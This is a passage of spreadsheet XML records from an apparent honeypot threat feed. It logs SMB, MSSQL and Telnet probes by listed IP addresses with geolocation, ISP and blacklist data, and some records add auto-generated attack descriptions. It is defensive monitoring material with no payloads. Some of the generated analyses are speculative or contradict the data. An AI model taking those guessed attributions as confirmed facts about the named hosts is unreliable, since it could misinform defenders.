    <s v="51.4258"/>
    <s v="60077"/>
    <s v="Asre Dadeha Asiatech"/>
    <s v="IR-AT"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c197:938d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="79"/>
    <x v="79"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T19:39:19"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-30T19:39:19"/>
    <n v="55"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DHCP_H2&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27"/>
    <s v="67&amp;&amp;37650&amp;&amp;1433&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HEA"/>
    <s v="Eastern"/>
    <s v="NA"/>
    <s v="Chai Wan"/>
    <s v="1820002"/>
    <s v="NA"/>
    <s v="22.2661"/>
    <s v="114.247"/>
    <s v="152194"/>
    <s v="CTG Server Limited"/>
    <s v="Rackip Consultancy Pte. LTD"/>
    <s v="hosting"/>
    <s v="BGP Network Limited Co., Ltd"/>
    <s v="1989-05-23"/>
    <s v="CTG163-191-JP"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:867a:a98e"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="80"/>
    <x v="80"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T19:32:24"/>
    <d v="2024-04-23T10:30:27"/>
    <d v="2025-04-30T19:32:24"/>
    <n v="135"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H18"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;36488&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="61"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.1967"/>
    <s v="106.822"/>
    <s v="17995"/>
    <s v="PT iForte Global Internet"/>
    <s v="SOLUSINET"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2021-03-17"/>
    <s v="SOLUSINET-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,63735)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,58358)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,51591)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,52583)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,54913)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,55898)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,50998)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,52437)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,49987)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,50306)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60281)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60292)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60295)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60296)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60300)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60317)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,60320)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,61218)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,61909)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,54239)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,58061)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,59074)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,56306)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,56863)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,62632)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,63130)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,52724)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,53236)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,57831)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,52096)}&amp;&amp;{Data_SMB:Incoming connection (103.164.116.122,54211)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a4:747a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="A suspicious incoming connection was detected from an unknown IP address, which may indicate an attempted unauthorized access or a potential malware spread. The connection originated from 103.164.116.122 to port 57831. This could be a sign of a malicious entity probing the system for vulnerabilities. &amp;&amp; There is no log data provided, so there is nothing to analyze."/>
    <s v="SMB Scanning &amp;&amp; SMB Scanning &amp;&amp; Port Scan &amp;&amp; SMB Scanning"/>
  </r>
  <r>
    <x v="81"/>
    <x v="81"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:57:44"/>
    <d v="2024-04-15T02:37:51"/>
    <d v="2025-04-30T18:57:44"/>
    <n v="30962"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H42&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;1051&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KG"/>
    <s v="Kyrgyzstan"/>
    <s v="GB"/>
    <s v="Bishkek"/>
    <s v="NA"/>
    <s v="Bishkek"/>
    <s v="1528675"/>
    <s v="NA"/>
    <s v="42.8746"/>
    <s v="74.5698"/>
    <s v="12764"/>
    <s v="AKNET Ltd."/>
    <s v="AKNET Ltd."/>
    <s v="business"/>
    <s v="AKNET Ltd."/>
    <s v="2009-08-31"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d56d:40f8"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="82"/>
    <x v="82"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:49:59"/>
    <d v="2025-04-30T14:42:57"/>
    <d v="2025-04-30T18:49:59"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:346b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="83"/>
    <x v="83"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:47:51"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-30T18:47:51"/>
    <n v="226"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H11&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H31&amp;&amp;SMA-LAB_MSSQL_H20&amp;&amp;SMA-LAB_SMB_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="SA"/>
    <s v="North Sulawesi"/>
    <s v="Kabupaten Minahasa Utara"/>
    <s v="Tatelu"/>
    <s v="1624619"/>
    <s v="NA"/>
    <s v="1.5307"/>
    <s v="124.948"/>
    <s v="134658"/>
    <s v="PT JULIA MULTIMEDIA NUSANTARA"/>
    <s v="PT JULIA MULTIMEDIA NUSANTARA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2021-11-03"/>
    <s v="IDNIC-ARTHACOM-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61102)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,65139)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,65240)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,54471)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,54625)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60005)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62130)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62235)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61554)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61633)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62401)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,50022)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,50045)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,49656)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,49659)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,50084)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60308)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60386)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,51356)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,51390)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,51872)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,63603)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,63628)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,64090)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,53374)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,53840)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,56923)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,57019)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,57125)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,57615)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,57699)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60771)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60804)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61217)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60820)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,60900)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,57762)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62078)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62204)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61461)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61462)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,61797)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,53591)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,53597)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,53974)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,62840)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,51749)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,55599)}&amp;&amp;{Data_SMB:Incoming connection (103.175.188.37,56606)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67af:bc25"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No available log data provided for analysis. &amp;&amp; An unknown system from IP address 103.175.188 is making an incoming SMB connection to the monitored service at port 62840. This could be a potential attempt to exploit a vulnerability or spread malware. The system may also be scanning for open ports and services. &amp;&amp; An unknown IP address is attempting to connect to a shared resource using SMB protocol._x000a_This could be a scan or reconnaissance attempt by an attacker._x000a_Possible malicious activity may be in progress. &amp;&amp; Unauthorized user attempted to authenticate using SMB protocol, suggesting potential password cracking or malware activity. This could be an attempt to gain access to network resources. The user may be trying to exploit vulnerabilities in the system. &amp;&amp; The attacker is attempting to authenticate with the SMB service using an invalid message format, potentially trying to exploit vulnerabilities or gather information. This could be an attempt at brute forcing credentials or exploiting a buffer overflow vulnerability in the SMB service. The attacker may be trying to gain unauthorized access to sensitive files and data. &amp;&amp; An SMB authenticate message was sent to the system, potentially attempting unauthorized access to share resources._x000a_This could be an indication of a brute-force attack or scanning for vulnerable shares._x000a_The attacker is trying to obtain login credentials. &amp;&amp; Possible malicious activity is an SMB authentication attempt which could be part of a brute force attack or unauthorized access to network resources. This may indicate a vulnerability scan or exploitation attempt by an attacker. An intruder might be trying to gain unauthorized access using valid credentials or attempting to crack them. &amp;&amp; No data provided. &amp;&amp; A suspicious incoming SMB connection has been detected from IP address 103.175.188.37 on an unknown port, which may be a sign of unauthorized access or malicious activity. This could potentially allow attackers to spread malware, steal sensitive data, or disrupt network operations. The IP address and port combination may indicate a botnet or malicious actor attempting to exploit vulnerabilities in SMB services. &amp;&amp; Possible malicious activity: A remote device attempted to establish a connection to an SMB service on our system from an external IP address. The source IP address is 103.175.188.37 and the remote port used was 56606. This may indicate unauthorized access or potential malware spread via the SMB service."/>
    <s v="SMB Brute &amp;&amp; SMB Auth Bypass &amp;&amp; Password Cracking &amp;&amp; SMB Auth &amp;&amp; SMB Scan &amp;&amp; SMB Scanning"/>
  </r>
  <r>
    <x v="84"/>
    <x v="84"/>
    <s v="node-yr9.pool-125-26.dynamic.nt-isp.net"/>
    <x v="0"/>
    <d v="2025-04-30T18:31:58"/>
    <d v="2025-04-30T17:08:51"/>
    <d v="2025-04-30T18:31:58"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Bangkok Yai"/>
    <s v="Bangkok Yai"/>
    <s v="1619457"/>
    <s v="NA"/>
    <s v="13.7232"/>
    <s v="100.476"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="business"/>
    <s v="TOT Public Company Limited"/>
    <s v="2006-10-26"/>
    <s v="totnet"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2025-01-17 03:50:09"/>
    <s v="2026-01-17 03:50:09"/>
    <s v="2025-01-20 03:36:34"/>
    <s v="['NS1.TOTONLINE.NET', 'NS2.TOTONLINE.NET']"/>
    <s v="GMO Internet, Inc."/>
    <s v="ok https://icann.org/epp#ok"/>
    <s v="Whois Privacy Protection Service by onamae.com"/>
    <x v="4"/>
    <s v="NA"/>
    <s v="['26-1 Sakuragaoka-cho', 'Cerulean Tower 11F']"/>
    <s v="::ffff:7d1a:aff5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="85"/>
    <x v="85"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T18:17:51"/>
    <d v="2024-04-16T11:04:08"/>
    <d v="2025-04-30T18:17:51"/>
    <n v="103"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H28&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;1433&amp;&amp;445&amp;&amp;58605&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="AO"/>
    <s v="Angola"/>
    <s v="LUA"/>
    <s v="Luanda"/>
    <s v="Luanda Municipality"/>
    <s v="Luanda (Ingombota)"/>
    <s v="2240449"/>
    <s v="NA"/>
    <s v="-8.82337"/>
    <s v="13.2446"/>
    <s v="36907"/>
    <s v="TV CABO ANGOLA LDA"/>
    <s v="TVCAO-CRNTW4"/>
    <s v="business"/>
    <s v="TVCabo Angola, Lda"/>
    <s v="2010-12-01"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,11959)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,5405)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,53246)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,11094)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,63084)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,42673)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,62233)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,54457)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,35870)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,47297)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,1476)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,50929)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,42234)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,3829)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.63.167.40,35967)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE 